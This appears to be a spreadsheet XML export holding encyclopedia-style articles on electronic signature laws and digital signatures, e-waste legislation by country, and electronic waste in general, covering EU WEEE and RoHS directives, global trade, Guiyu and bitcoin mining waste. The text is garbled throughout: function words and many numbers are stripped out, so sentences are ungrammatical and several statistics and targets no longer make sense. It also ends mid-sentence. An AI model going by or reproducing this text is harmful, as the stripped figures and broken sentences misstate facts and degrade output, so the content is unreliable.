privind semnătura electronică documentul electronic (http://lex.justice.md/md/353612/) zealand contract commercial 2017 paraguay 4017: validez jurídica firma electrónica, firma digital, mensajes datos expediente electrónico (12/23/2010) spanish), 4610: modifica amplia 4017/10 (05/07/2012) spanish) peru 27269. firmas certificados digitales (28may2000) archived 2014-04-29 wayback machine spanish) philippines electronic commerce 2000 poland ustawa podpisie elektronicznym (dziennik ustaw 2001 poz. 1450) romania legea iulie 2001 privind semnătura electronică russian federation federal russian federation electronic signature (06.04.2011) singapore electronic transactions (2010) (background information, differences 1998 2010) slovakia zákon č.215/2002 elektronickom podpise slovenia slovene electronic commerce electronic signature south africa electronic communications transactions [no. 2002] spain 6/2020, noviembre, reguladora determinados aspectos servicios electrónicos confianza switzerland zertes republika srpska (entity bosnia herzegovina) 2005 turkey electronic signature ukraine electronic signature law, 2003 electronic communications 2000 u.s. electronic signatures global national commerce u.s. uniform electronic transactions adopted states u.s. government paperwork elimination (gpea) u.s. uniform commercial code (ucc) usage 2016, aberdeen strategy research reported "best-in-class" respondents surveyed made electronic signature processes supply chain procurement, delivering benefits speed efficiency procurement activities. percentages survey respondents using electronic signatures accounts payable accounts receivable processes little lower, "best-in-class" respondents case. technological implementations (underlying technology) digital signature digital signatures cryptographic implementations electronic signatures used proof authenticity, data integrity non-repudiation communications conducted internet. when implemented compliance digital signature standards, digital signing offer end-to-end privacy signing process user-friendly secure. digital signatures generated verified standardized frameworks digital signature algorithm (dsa) nist compliance xades, pades cades standards, specified etsi.there typically three algorithms involved digital signature process: generation this algorithm provides private along corresponding public key. signing this algorithm produces signature upon receiving private message signed. verification this algorithm checks message's authenticity verifying along signature public key.the process digital signing requires accompanying public authenticate signature generated fixed message private key. using cryptographic algorithms, user's signature cannot replicated without access private key. secure channel typically required. applying asymmetric cryptography methods, digital signature process prevents several common attacks attacker attempts gain access following attack methods.the relevant standards digital signatures respect size domestic markets digital signature standard (dss) national institute standards technology (nist) eidas regulation enacted european parliament. openpgp non-proprietary protocol email encryption public cryptography. supported gnupg, s/mime ietf standards evolved popular email encryption standard world. biometric signature electronic signature also refer electronic forms processing verifying identity biometric "signatures" biologically identifying qualities individual. such signatures approach attaching biometric measurement document evidence. biometric signatures include fingerprints, hand geometry (finger lengths palm size), iris patterns, voice characteristics, retinal patterns, human body property. collected using electronic sensors kind. biometric measurements type useless passwords can't changed compromised. however, might serviceable, except date, easily deceived carry little assurance person purportedly signed document actually person did. example, replay electronic signal produced submitted computer system responsible 'affixing' signature document collected wiretapping techniques. many commercially available fingerprint sensors resolution deceived inexpensive household items (for example, gummy bear candy gel). case user's face image, researchers vietnam successfully demonstrated late 2017 specially crafted mask could beat apple's face iphone references further reading margo tank, david whitaker, jeremiah buckley (2020). electronic signatures. 2020 edition, thomson reuters. stephen mason (2016). electronic signatures (4th ed.). institute advanced legal studies humanities digital library, school advanced study, university london. isbn 978-1-911507-00-0. free download humanities digital library. external links e-sign final report (2005, european union)judicial studies board digital signature guidelinesdynamic signatures</t>
  </si>
  <si>
    <t>Electronic waste by country</t>
  </si>
  <si>
    <t>electronic waste significant part today's global, post-consumer waste stream. efforts made recycle reduce waste. basel convention basel convention control transboundary movements hazardous wastes their disposal, usually known simply basel convention, international treaty designed reduce movements hazardous waste nations, specifically prevent transfer hazardous waste developed less developed countries. parties convention, afghanistan, haiti, united states signed convention ratified government regulation united nations conference trade development (unctad) tends support repair recycling trade. mining produce metals, meet demand finished products west, also occurs countries, unctad recommended restrictions recycling exports balanced environmental costs recovering materials mining. hard rock mining produces toxins produced industries united states.greenpeace contends residue problems significant exports used electronics banned. africa south africa e-waste association south africa (ewasa) established 2008 manage establishment sustainable environmentally sound e-waste management system country. since non-profit organization working manufacturers, vendors distributors electronic electrical goods e-waste handlers (including re-furbishers, dismantlers recyclers) manage e-waste effectively. asia many asian countries legislated, electronic waste recycling. south korea, japan taiwan ensure manufacturer responsibility demanding recycle annual production. china chinese laws primarily concerned eliminating import e-waste. china ratified basel convention well basel amendment, officially banning import e-waste. october 2008, chinese state council also approved "draft regulation management electronic waste." this regulation intended promote continued resources recycling monitor end-of-life treatment electronics. under regulations, recycling electronics consumer mandated. also requires recycling unnecessary materials discarded manufacturing process. india japan europe some european countries implemented laws prohibiting disposal electronic waste landfills 1990s. "this created e-waste processing industry europe." switzerland, first electronic waste recycling system implemented 1991, beginning collection refrigerators. over years, electric electronic devices gradually included system. legislation followed 1998, since january 2005 possible return electronic waste sales points collection points free charge. there established producer responsibility organizations: swico, mainly handling information, communication, organization technology, sens, responsible electrical appliances. total amount recycled electronic waste exceeds capita year.additionally, european union implemented several directives regulations place responsibility "recovery, reuse recycling" manufacturer. waste electrical electronic equipment directive (weee directive), often referred transposed national laws member countries european union. designed make equipment manufacturers financially physically responsible equipment life, policy known extended producer responsibility (epr). "users electrical electronic equipment private households possibility returning weee least free charge", manufacturers must dispose environmentally friendly manner, ecological disposal, reuse, refurbishment. seen useful policy internalizes end-of-life costs provided competitive incentive companies design equipment fewer costs liabilities reached life. however, application weee directive criticized implementing concept collective manner, thereby losing competitive incentive individual manufacturers rewarded green design.[32] since august 2005, electronics manufacturers become financially responsible compliance weee directive. under directive, country recycles least electronic waste capita year. furthermore, directive "decrease e-waste e-waste exports.". december 2008 draft revision directive proposed market-based goal 65%, capita case united kingdom. decision proposed revisions could result weee directive 2012. directive restriction certain hazardous substances electrical electronic equipment (2002/95/ec), commonly referred restriction hazardous substances directive (rohs directive), also adopted february 2003 european union. rohs directive took effect july 2006, required enforced become member state. this directive restricts hazardous materials manufacture various types electronic electrical equipment. battery directive enacted 2006 regulates manufacture, disposal trade batteries european union. north america canada february 2004, similar california added cost purchasing televisions, computers, computer components alberta, first kind canada. saskatchewan also implemented electronics recycling february 2007, followed british columbia august 2007, nova scotia february 2008, ontario april 2009, quebec october 2012. 2007, manitoba issued proposed electrical electronic equipment stewardship regulation sale regulated products forbidden unless covered stewardship program. "products covered legislation include tvs, computers, laptops, scanners." recycling regulation passed ontario october 2004, requires producers "either develop product stewardship plans comply product stewardship program specific products."canadian federal legislation export import hazardous waste hazardous recyclable material regulations (eihwhrmr) operates basic premises, electronic waste either "intact" "not intact". various annexes define hazardous waste canada, also deem waste "...considered defined hazardous legislation country receiving prohibited country imported conveyed transit" covered canadian regulation therefore subject prior informed consent procedures.the loophole regulations allows tons e-waste exported canada definition "intact" "functional". non-functioning electronic device intact exported current legislation. what can't exported non-functioning longer intact electronic device. principal problem being, non-functioning electronic device high risk disassembled away e-waste dumping ground. canadian government's unique interpretation basel convention obligations "intact" "not intact" opens door uncontrolled e-waste exports long device intact. canadian fact sheet associated links.since canada ratified basel convention august 1992, august 2011, environment canada's enforcement branch initiated investigations violations eihwhrmr, still progress. there prosecutions undertaken non-compliance provisions eihwhrmr still courts. united states middle east israel israel adopted national e-waste went effect march 2014. 2021, demands electronic companies must recycle least weight electronics sell. addition, companies required accept electronics consumers free charge. israel’s e-waste laws resulted much greater participation recycling. israel’s main companies, m.a.i., electronics recycling corporation, reported recycled 5000 tons electronic waste 2014, already exceeds personal requirement recycling 4700 tons. latin america laws latin america present could improvement terms “consistency regarding criteria development programs impeded broad development laws, post evaluation programs, overall cost waste management, reduction resources decrease public sector burden”. however, aspect differentiates laws currently present u.s. quickly moving away voluntary laws working towards implementing direct/demanding policies. countries “colombia, costa rica, chile first region introduce policy approach seeks address problems pollution overflowing landfills implementing alternatives waste management”. chile given rise waste production past decade, solid waste management recently become central concern chile’s government. 2009, chilean national environmental commission identified chile “one countries highest rates waste generation latin america”. they’ve since working implement law, help national environment commission (conama), would regulatory power waste production. august 2013, chilean congress approved established framework waste management, encouragement recycling. colombia 2013, colombia implemented ultimately focused enforcing guidelines managing electronic waste. additionally, country developed number “post-consumer programs used batteries, medicine, computers printers, fluorescent light bulbs, used tires pesticide containers”. today, colombia legal framework place. brazil upon implementation 2006, mercosur policy agreement mandated brazil, argentina, paraguay, uruguay anchor laws environmental policies. brazil enacted national policy reduce solid waste ultimately acted reduce solid hazardous waste. oceania electronic waste still nearly .981 million tons e-waste australia electronic waste agenda australian federal government since mid-1990s. australian zealand environment conservation council (now replaced environment protection heritage council (ephc)) first body identify electrical electronic waste concern. 2002, ephc declared e-waste needed action. electrical equipment product stewardship sub-group examined issue decided computer television waste 'wastes concern'. since time television computer industry working ephc identify suitable manage end-of-life televisions computers. november 2008 ephc committed development national solution issue managing television computer waste. this action culminated release package documents designed enable public consultation various options managing end-of-life televisions computers july 2009. main document package consultation regulatory impact statement: televisions computers. paper canvasses various options managing end-of-life units analyses costs benefits each. consultation paper preferred option. preferred option developed government public consultation process prior next meeting ephc november 2009 perth state federal minister adopt position.a series public meetings held adelaide, perth, sydney melbourne receive feedback government's proposals. meetings occurred late july early august 2009. november 2009 national waste policy agreed governments across australia officially endorsed council australian governments august 2010. product stewardship 2011 introduced legislation provided framework developing legislatively backed product stewardship australia. shortly thereafter national television computer recycling scheme (ntcrs) introduced, mandated first targets electronics recycling australia. ntcrs strong focus providing free access australian public e-waste recycling, services rolled progressively across australian states 2012/13. with initial focus televisions, computers computer peripherals ntcrs aims significantly increase recycling rates electronics australia, estimated 17.00% 2010 30.00% 2012/13 80.00% 2021/22. product stewardshipproduct stewardship australia (psa) not-for-profit organisation established television industry lead developing recycling programs e-waste australia, particularly televisions. works closely state federal governments along industry associations advance product stewardship australia. contributed development consultation regulatory impact statement televisions computers. zealand also references notes further reading manomaivibool, panate; lindhqvist, thomas; tojo, naoko (august 2007). extended producer responsibility non-oecd context: management waste electrical electronic equipment india. report commissioned greenpeace international. lund: lund university international institute industrial environmental economics. isbn 978-91-88902-41-2. retrieved august 2012. external links weee directive (u.k.) weee directive (u.k.) weee directive (e.c.) e-waste comprehensive utilization work committee (chinese) recycling e-waste france (french) environmentally friendly ways dispose numerous fluorescent light bulbs (u.k.)organizationsweee forum european recycling platform, european e-waste association e-waste association south africa toxics link, delhi, india</t>
  </si>
  <si>
    <t>Electronic waste</t>
  </si>
  <si>
    <t>electronic waste e-waste describes discarded electrical electronic devices. used electronics destined refurbishment, reuse, resale, salvage recycling material recovery, disposal also considered e-waste. informal processing e-waste developing countries lead adverse human health effects environmental pollution. electronic scrap components, cpus, contain potentially harmful materials lead, cadmium, beryllium, brominated flame retardants. recycling disposal e-waste involve significant risk health workers communities. definition e-waste electronic waste created electronic product discarded useful life. rapid expansion technology consumption driven society results creation large amount e-waste. united states environmental protection agency (epa) classifies waste categories: these include used electronics destined reuse, resale, salvage, recycling, disposal well re-usables (working repairable electronics) secondary materials (copper, steel, plastic, similar). term "waste" reserved residue material dumped buyer rather recycled, including residue reuse recycling operations, loads surplus electronics frequently commingled (good, recyclable, non-recyclable). several public policy advocates apply term "e-waste" "e-scrap" broadly apply surplus electronics. cathode tubes (crts) considered hardest types recycle. using different categories, partnership measuring development defines e-waste categories: products category vary longevity profile, impact, collection methods, among differences.crts relatively high concentration lead phosphors (not confused phosphorus), necessary display. united states environmental protection agency (epa) includes discarded monitors category "hazardous household waste" considers crts aside testing commodities discarded, speculatively accumulated, left unprotected weather damage. these devices often confused rear projection different recycling process materials composed. member states operate system european waste catalogue (ewc) european council directive, interpreted "member state law". form list wastes directive. however, list (and ewc) gives broad definition (ewc code 13*) hazardous electronic waste, requiring "waste operators" employ hazardous waste regulations (annex annex refined definition. constituent materials waste also require assessment combination annex annex iii, allowing operators determine whether waste hazardous.debate continues distinction "commodity" "waste" electronics definitions. some exporters accused deliberately leaving difficult-to-recycle, obsolete, non-repairable equipment mixed loads working equipment (though also come ignorance, avoid costly treatment processes). protectionists broaden definition "waste" electronics order protect domestic markets working secondary equipment. high value computer recycling subset electronic waste (working reusable laptops, desktops, components like ram) help cost transportation larger number worthless pieces achieved display devices, less negative) scrap value. 2011 report, "ghana e-waste country assessment", found 215,000 tons electronics imported ghana, brand used. used product, study concluded reused scrapped discarded. this contrasts published uncredited claims imports ghana burned primitive conditions. quantity e-waste considered "fastest-growing waste stream world" 44.7 million tonnes generated 2016- equivalent 4500 eiffel towers. 2018, estimated million tonnes e-waste reported, thus name 'tsunami e-waste' given value least $62.5 billion annually.rapid changes technology, changes media (tapes, software, mp3), falling prices, planned obsolescence resulted fast-growing surplus electronic waste around globe. technical solutions available, cases, legal framework, collection, logistics, services need implemented technical solution applied. display units (crt, lcd, monitors), processors (cpu, gpu, chips), memory (dram sram), audio components different useful lives. processors frequently out-dated software longer optimized) likely become "e-waste" display units often replaced working without repair attempts, changes wealthy nation appetites display technology. this problem could potentially solved modular smartphones (such phonebloks concept). these types phones durable technology change certain parts phone making environmentally friendly. being able simply replace part phone broken reduce e-waste. estimated million tons e-waste produced year. discards million computers year million phones disposed europe year. environmental protection agency estimates 15–20% e-waste recycled, rest electronics directly landfills incinerators. 2006, united nations estimated amount worldwide electronic waste discarded year million metric tons. according report unep titled, "recycling e-waste resources," amount e-waste produced including mobile phones computers could rise much percent next decade countries, india. united states world leader producing electronic waste, tossing away million tons year. china already produces million tons (2010 estimate) domestically, second united states. and, despite banned e-waste imports, china remains major e-waste dumping ground developed countries. society today revolves around technology constant need newest high-tech products contributing mass amount e-waste. since invention iphone, cell phones become source e-waste products electrical waste contains hazardous also valuable scarce materials. elements found complex electronics. 2013, apple sold million idevices (ipod, iphone, ipad). cell phone companies make cell phones made last consumer purchase phones. companies give products short lifespans know consumer want product make united states, estimated heavy metals landfills comes discarded electronics.while agreement number discarded electronic devices increasing, considerable disagreement relative risk (compared automobile scrap, example), strong disagreement whether curtailing trade used electronics improve conditions, make worse. according article motherboard, attempts restrict trade driven reputable companies supply chain, unintended consequences. e-waste data 2016 2016, asia territory brought significant extensive volume e-waste (18.2 mt), accompanied europe (12.3 metric tons), america (11.3 metric tons), africa (2.2 metric tons), oceania (0.7 metric tons). smallest terms total e-waste made, oceania largest generator e-waste capita (17.3 kg/inhabitant), hardly e-waste cited gathered recycled. europe second broadest generator e-waste citizen, average 16.6 kg/inhabitant; however, europe bears loftiest assemblage figure (35%). america generates 11.6 kg/inhabitant solicits e-waste caused provinces, commensurate assortment count asia (15%). however, asia generates fewer e-waste citizen (4,2 kg/inhabitant). africa generates kg/inhabitant, limited information available collection percentage. record furnishes regional breakdowns africa, americas, asia, europe, oceania. phenomenon somewhat illustrates modest number figure linked overall volume e-waste made countries administrator e-waste data. countries, e-waste volumes collected exploration evaluated. outcome considerable bulk e-waste (34.1 metric tons) unidentified. countries national e-waste constitution stand, e-waste possible interpreted alternative general waste. this land-filled recycled, along alternative metal plastic scraps. there colossal compromise toxins drawn want accordingly, chosen want informal sector converted without well safeguarding laborers venting contaminations e-waste. although e-waste claim rise, flourishing quantity countries embracing e-waste regulation. national e-waste governance orders enclose world population, rise reached 2014 e-waste data 2019 2019, enormous volume e-waste (53.6 capita average) generated globally. this projected increase 2030. asia still remains largest contributor significant volume electronic waste 24.9 followed americas (13.1 mt), europe mt), africa oceania respectively. capita generation, europe came first 16.2 oceania second largest generator 16.1 followed americas. africa least generator e-waste capita regarding collection recycling waste, continent europe ranked first (42.5%), asia came second (11.7%). americas oceania next (9.4% 8.8% respectively), africa trails behind 0.9%. 53.6 metric tons generated e-waste globally, formally documented collection recycling 9.3%, fate 44.3% remains uncertain, whereabouts impact environment varying across different regions world. however, number countries national e-waste legislation, regulation policy, increased since 2014, great proportion undocumented commercial domestic waste mixed streams waste like plastic metal waste, implying fractions easily recyclable might recycled, conditions considered inferior without depollution recovery materials considered valuable. e-waste data 2021 2021, estimated 57.4 e-waste generated globally. according estimates europe, problem best studied, electronic items average household longer broken. annually citizen, another unused electrical electronic products hoarded europe prior discarded. 2021, less percent e-waste collected recycled. e-waste legislative frameworks european union (eu) addressed issue electronic waste introducing pieces legislation. first, waste electrical electronic equipment directive (weee directive) came force 2003. main directive regulate motivate electronic waste recycling re-use member states moment. revised 2008, coming force 2014.[2] furthermore, also implemented directive restriction certain hazardous substances electrical electronica equipment 2003.[3] this documents additionally revised 2012.[4] when comes western balkan countries, north macedonia adopted batteries accumulators 2010, followed management electrical electronic equipment 2012. serbia regulated management special waste stream, including electronic waste, national waste management strategy (2010–2019).[5] montenegro adopted concessionary concerning electronic waste ambition collect waste annually person 2020.[6] albanian legal framework based draft waste electrical electronic equipment 2011 focuses design electrical electronic equipment. contrary this, bosnia herzegovina still missing regulating electronic waste. october 2019, countries globally established either policy, legislation specific regulation govern e-waste. however, clear indication countries following regulations. regions asia africa policies legally binding rather programmatic ones. hence, poses challenge e-waste management policies fully developed globally countries. solving e-waste problem (step) initiative solving e-waste problem membership organization part united nations university created develop solutions address issues associated electronic waste. some eminent players fields production, reuse recycling electrical electronic equipment (eee), government agencies ngos well organisations count among members. step encourages collaboration stakeholders connected e-waste, emphasizing holistic, scientific applicable approach problem.: waste electrical electronic equipment european commission (ec) classified waste electrical electronic equipment (weee) waste generated electrical devices household appliances like refrigerators, televisions, mobile phones devices. 2005 reported total waste million tonnes 2020 estimates waste million tonnes. this electronic waste hazardous materials managed properly, badly affecting environment causing fatal health issues. disposing materials requires manpower properly managed facilities. disposal, manufacturing types materials require huge facilities natural resources (aluminum, gold, copper silicon, etc.), ending damaging environment pollution. considering impact weee materials make environment, legislation made legislations: weee directive; rohs directive: directive usage restrictions hazardous materials producing electrical electronic equipment. weee directive: this directive implemented february 2003, focusing recycling electronic waste. this directive offered many electronic waste collection schemes free charge consumers (directive 2002/96/ec [7]). revised directive december 2008, since become fastest growing waste stream. august 2012, weee directive rolled handle situation controlling electronic waste implemented february 2014 (directive 2012/19/eu [8]). april 2017, adopted common principle carrying research implementing regulation monitor amount weee. requires member state monitor report national market data. annex weee directive (directive 2012/19/eu): re-examination timelines waste collection setting individual targets (report [9]). weee legislation: july 2012, passed legislation weee (directive 2012/19/eu [10]). know progress adopting directive 2012/19/eu (progress [11]). february 2014, revised directive. know directive 2002/96/ec, (report [12]). rohs directive: 2003, implemented legislation waste collection also alternative hazardous materials (cadmium, mercury, flammable materials, polybrominated biphenyls, lead polybrominated diphenyl ethers) used production electronic electric equipment (rohs directive 2002/95/ec [13]). this directive revised december 2008 later january 2013 (rohs recast directive 2011/65/eu [14]). 2017, made adjustment existing directive considering impact assessment [15] adopted legislative proposal [16] (rohs scope review [17]). november 2017, european parliament council published legislation amending rohs directive official journal [18]. european commission legislation batteries accumulators (batteries directive) each year, reports nearly tons batteries automotive industry, industrial batteries around tons consumer batteries around tons entering europe region. these batteries commonly used products household appliances battery powered products day-to-day life. important issue look battery waste collected recycled properly, consequences resulting hazardous materials release environment water resources. generally, many parts batteries accumulators capacitors recycled without releasing hazardous materials release environment contaminating natural resources. rolled directive control waste batteries accumulators known 'batteries directive'[19] aiming improve collecting recycling process battery waste control impact battery waste environment. this directive also supervises administers internal market implementing required measures. this directive restricts production marketing batteries accumulators contains hazardous materials harmful environment, difficult collect recycle them. batteries directive [20] targets collection, recycling recycling activities batteries accumulators, also approving labels batteries environment neutral. december 2020, proposed regulation (batteries regulation [21]) batteries waste aims make sure batteries entering european market recyclable, sustainable non-hazardous (press release [22]). legislation: 2006, adopted batteries directive revised 2013. september 2006, european parliament european council launched directives waste batteries accumulators (directive 2006/66/ec [23]). overview batteries accumulators legislation [24] evaluation directive 2006/66/ec (batteries directive): revising directives could based evaluation [25] process, considering fact increase usage batteries increase multiple communication technologies, household appliances small battery-powered products. increase demand renewable energies recycling products also initiative 'european batteries alliance (eba)' aims supervise complete value chain production improved batteries accumulators within europe policy act. though adoption evaluation [26] process broadly accepted, concerns rose particularly managing monitoring hazardous materials production batteries, collection battery waste, recycling battery waste within directives. evaluation process definitely gave good results areas like controlling environmental damage, increasing awareness recycling, reusable batteries also improving efficiency internal markets. however, limitations implementations batteries directive process collecting batteries waste recovering usable materials them. evaluation process throws light process implementation collaborate technical aspects process ways makes difficult implement directive maintains balance technological advancements. ec's regulations guidelines made evaluation process impactful positive way. participation number stakeholders evaluation process invited asked provide views ideas improve process evaluation information gathering. march 2018, stakeholders members association participated provide information findings, support increase process evaluation roadmap [27]. european union regulations e-waste european union (eu) addressed e-waste issue adopting several directives. 2011 amendment made 2003 directive 2002/95/ec regarding restriction hazardous materials planning manufacturing process eee. 2011 directive, 2011/65/eu stated motivation specific restriction usage hazardous materials planning manufacturing process electronic electrical devices disparity member state laws need arose forth rules protect human health environmentally sound recovery disposal weee. (2011/65/eu, (2)) directive lists several substances subject restriction. directive states restricted substances maximum concentration values tolerated weight homogeneous materials following: lead (0.1%); mercury (0.1%), cadmium (0.1%), hexavalent chromium (0.1%), polybrominated biphenyls (pbb) (0.1%) polybrominated diphenyl ethers (pbde) (o,1 technologically feasible substitution available, usage substitution required. there are, however, exemptions case substitution possible scientific technical point view. allowance duration substitutions take account availability substitute socioeconomic impact substitute. (2011/65/eu, (18)) directive 2012/19/eu regulates weee lays measures safeguard ecosystem human health inhibiting shortening impact generation management waste weee. (2012/19/eu, (1)) directive takes specific approach product design eee. states article member states constraint expedite kind model manufacturing process well cooperation producers recyclers facilitate re-use, dismantling recovery weee, components, materials. (2012/19/eu, (4)) member states create measures make sure producers eco-design, meaning type manufacturing process used would restrict later re-use weee. directive also gives member states obligation ensure separate collection transportation different weee. article lays requirements proper treatment weee. base minimum proper treatment required every weee removal liquids. recovery targets seen following figures. annex directive 2012/19/eu categories covered follows: large household appliances small household appliances telecommunications equipment consumer equipment photovoltaic panels lighting equipment electrical electronic tools (with exception large-scale stationary industrial tools) toys, leisure sports equipment medical devices (with exception implanted infected products) monitoring control instruments autonomic dispensersminimum recovery targets referred directive 2012/19/eu starting august 2018: weee falling within category annex shall recovered, shall prepared re-use recycled; weee falling within category annex shall recovered, shall prepared re-use recycled; weee falling within category annex -75% shall recovered, shall prepared re-use recycled; discharged lamps, shall recycled. 2021, european commission proposed implementation standardization iterations usb-c phone charger products commissioning impact assessment studies technology analysis study. regulations like reduce electronic waste small significant amounts well case, increase device-interoperability, convergence convenience consumers decreasing resource-needs redundancy. regulations passed june 2022, mandating phones sold usb-c charging ports late 2024. international agreements report united nations environment management group lists processes agreements made various organizations globally effort manage control e-waste. details policies could retrieved links below. international convention prevention pollution ships (marpol) (73/78/97) basel convention control transboundary movements hazardous wastes disposal (1989) montreal protocol ozone depleting substances (1989) international labour organization (ilo) convention chemicals, concerning safety chemicals work (1990) organisation economic cooperation development (oecd), council decision waste agreement (1992) united nations framework convention climate change (unfccc) (1994) international conference chemicals management (iccm) (1995) rotterdam convention prior informed consent procedure certain hazardous chemicals pesticides international trade (1998) stockholm convention persistent organic pollutants (2001) world health organisation (who), world health assembly resolutions (2006–2016) hong kong international convention safe environmentally sound recycling ships (2009) archived january 2020 wayback machine minamata convention mercury (2013) paris climate agreement (2015) united nations framework convention climate change connect 2020 agenda global telecommunication/ict development (2014) global trade issues theory increased regulation electronic wastes concern environmental harm nature economies creates economic disincentive remove residues prior export. critics trade used electronics maintain still easy brokers calling recyclers export unscreened electronic waste developing countries, china, india parts africa, thus avoiding expense removing items like cathode tubes (the processing expensive difficult). developing countries become toxic dump yards e-waste. developing countries receiving foreign e-waste often repair recycle forsaken equipment. still e-waste ended landfills developing countries 2003. proponents international trade point success fair trade programs industries, cooperation creation sustainable jobs bring affordable technology countries repair reuse rates higher. defenders trade used electronics extraction metals virgin mining shifted developing countries. recycling copper, silver, gold, materials discarded electronic devices considered better environment mining. they also state repair reuse computers televisions become "lost art" wealthier nations refurbishing traditionally path development. south korea, taiwan, southern china excelled finding "retained value" used goods, cases billion-dollar industries refurbishing used cartridges, single-use cameras, working crts. refurbishing traditionally threat established manufacturing, simple protectionism explains criticism trade. works like "the waste makers" vance packard explain criticism exports working product, example, import tested working pentium laptops china, bans export used surplus working electronics japan. opponents surplus electronics exports argue lower environmental labor standards, cheap labor, relatively high value recovered materials lead transfer pollution-generating activities, smelting copper wire. electronic waste often sent various african asian countries china, malaysia, india, kenya processing, sometimes illegally. many surplus laptops routed developing nations "dumping grounds e-waste".because united states ratified basel convention amendment, domestic federal laws forbidding export toxic waste, basel action network estimates electronic waste directed recycling u.s. recycled all, container ships sent countries china. this figure disputed exaggeration epa, institute scrap recycling industries, world reuse, repair recycling association. independent research arizona state university showed 87–88% imported used computers higher value best value constituent materials contained, "the official trade end-of-life computers thus driven reuse opposed recycling". trade proponents trade growth internet access stronger correlation trade poverty. haiti poor closer port york southeast asia, electronic waste exported york asia haiti. thousands men, women, children employed reuse, refurbishing, repair, re-manufacturing, unsustainable industries decline developed countries. denying developing nations access used electronics deny sustainable employment, affordable products, internet access, force deal even less scrupulous suppliers. series seven articles atlantic, shanghai-based reporter adam minter describes many computer repair scrap separation activities objectively sustainable.opponents trade argue developing countries utilize methods harmful wasteful. expedient prevalent method simply toss equipment onto open fire, order melt plastics burn away non-valuable metals. this releases carcinogens neurotoxins air, contributing acrid, lingering smog. these noxious fumes include dioxins furans. bonfire refuse disposed quickly drainage ditches waterways feeding ocean local water supplies.in june 2008, container electronic waste, destined port oakland u.s. sanshui district mainland china, intercepted hong kong greenpeace. concern exports electronic waste raised press reports india, ghana, côte d'ivoire, nigeria.the research undertaken countering weee illegal trade (cwit) project, funded european commission, found europe (3.3 million tons) e-waste discarded 2012 ended officially reported amounts collection recycling systems. (6.15 million tons) either: exported (1.5 million tons), recycled non-compliant conditions europe (3.15 million tons), scavenged valuable parts (750,000 tons), simply thrown waste bins (750,000 tons). guiyu guiyu guangdong region china massive electronic waste processing community. often referred "e-waste capital world." traditionally, guiyu agricultural community; however, mid-1990s transformed e-waste recycling center involving local households additional 100,000 migrant workers. thousands individual workshops employ laborers snip cables, chips circuit boards, grind plastic computer cases particles, circuit boards acid baths dissolve precious metals. others work strip insulation wiring attempt salvage tiny amounts copper wire. uncontrolled burning, disassembly, disposal number environmental problems groundwater contamination, atmospheric pollution, water pollution either immediate discharge surface runoff (especially near coastal areas), well health problems including occupational safety health effects among directly indirectly involved, methods processing waste. many villages guiyu specialize circuit-board disassembly, seven plastics metals reprocessing, wire cable disassembly. greenpeace, environmental group, sampled dust, soil, river sediment, groundwater guiyu. they found high levels toxic heavy metals organic contaminants places. yun, campaigner group found "over poisonous metals, lead, mercury, cadmium." guiyu example digital dumps similar places found across world nigeria, ghana, india. other informal e-waste recycling sites guiyu likely oldest largest informal e-waste recycling sites world; however, many sites worldwide, including india, ghana (agbogbloshie), nigeria, philippines. there handful studies describe exposure levels e-waste workers, community, environment. example, locals migrant workers delhi, northern union territory india, scavenge discarded computer equipment extract base metals using toxic, unsafe methods. bangalore, located southern india, often referred "silicon valley india" growing informal e-waste recycling sector. study found e-waste workers slum community higher levels workers e-waste recycling facility. cryptocurrency e-waste bitcoin mining also contributed higher amounts electronic waste, become increasingly popular form currency global trade. according alex vries christian stoll, average bitcoin transaction yields grams electronic waste generated approximately 112.5 million grams waste 2020 alone. other estimates indicate bitcoin network discards much "small telecommunication equipment waste produced country like netherlands," totalling 30.7 metric kilotons every year. furthermore, rate bitcoin disposes waste exceeds major financial organizations visa, produces grams waste every 100,000 transactions.a major point concern rapid turnover technology bitcoin industry results high levels e-waste. this attributed proof-of-work principle bitcoin employs miners receive currency reward first decode hashes encode blockchain. such, miners encouraged compete another decode hash first. however, computing hashes requires massive computing power which, effect, drives miners obtain rigs highest processing power possible. attempt achieve this, miners increase processing power rigs purchasing advanced computer chips.according koomey's law, efficiency computer chips doubles every years, meaning miners incentivized purchase chips keep competing miners even though older chips still functional. cases, miners even discard chips earlier timeframe sake profitability. however, leads significant build waste, outdated application-specific integrated circuits (asic computer chips) cannot reused repurposed. most computer chips miners currently asic chips, whose sole function mine bitcoin, rendering useless cryptocurrencies operation piece technology. therefore, outdated asic chips disposed since unable repurposed. bitcoin e-waste problem exacerbated fact many countries corporations lack recycling programs asic chips. developing recycling infrastructure bitcoin mining prove beneficial, though, aluminum heat sinks metal casings asic chips recycled technology. much responsibility falls onto bitmain, leading manufacturer bitcoin, currently lacks infrastructure recycle waste bitcoin mining. without programs, much bitcoin waste ends landfill along 83.6% global total e-waste.many argue relinquishing proof-of-work model altogether favour proof-of-stake one. this model selects miner validate transactions blockchain, rather miners competing with competition, processing speed miners' rigs would matter. device could used validating blockchain, would incentive single-use asic chips continually purchase dispose ones. environmental impact recent study rising electronic pollution revealed average computer screen five eight pounds lead representing percent lead landfills. toxins persistent, bioaccumulative toxins (pbts) create environmental health risks computers incinerated, landfills melted down. emission fumes, gases, particulate matter air, discharge liquid waste water drainage systems, disposal hazardous wastes contribute environmental degradation. processes dismantling disposing electronic waste developing countries number environmental impacts illustrated graphic. liquid atmospheric releases bodies water, groundwater, soil, therefore land animals domesticated wild, crops eaten animals human, drinking water.one study environmental effects guiyu, china found following: airborne dioxins type found times levels previously measured levels carcinogens duck ponds rice paddies exceeded international standards agricultural areas cadmium, copper, nickel, lead levels rice paddies international standards heavy metals found road dust lead times control village's road dust copper timesthe agbogbloshie area ghana, 40,000 people live, provides example e-waste contamination pervade daily lives nearly residents. into area—one largest informal e-waste dumping processing sites africa—about 215,000 tons secondhand consumer electronics, primarily western europe, imported annually. because region considerable overlap among industrial, commercial, residential zones, pure earth (formerly blacksmith institute) ranked agbogbloshie world's worst toxic threats (blacksmith institute 2013).a separate study agbogbloshie e-waste dump, ghana found presence lead levels high 18,125 soil. standard lead soil play areas 1200 non-play areas. scrap workers agbogbloshie e-waste dump regularly burn electronic components auto harness wires copper recovery, releasing toxic chemicals like lead, dioxins furans environment. researchers brett robinson, professor soil physical sciences lincoln university zealand, warn wind patterns southeast china disperse toxic particles released open-air burning across pearl river delta region, home million people. way, toxic chemicals e-waste enter "soil-crop-food pathway," significant routes heavy metals' exposure humans. these chemicals biodegradable— persist environment long periods time, increasing exposure risk.in agricultural district chachoengsao, east bangkok, local villagers lost main water source result e-waste dumping. cassava fields transformed late 2017, nearby chinese-run 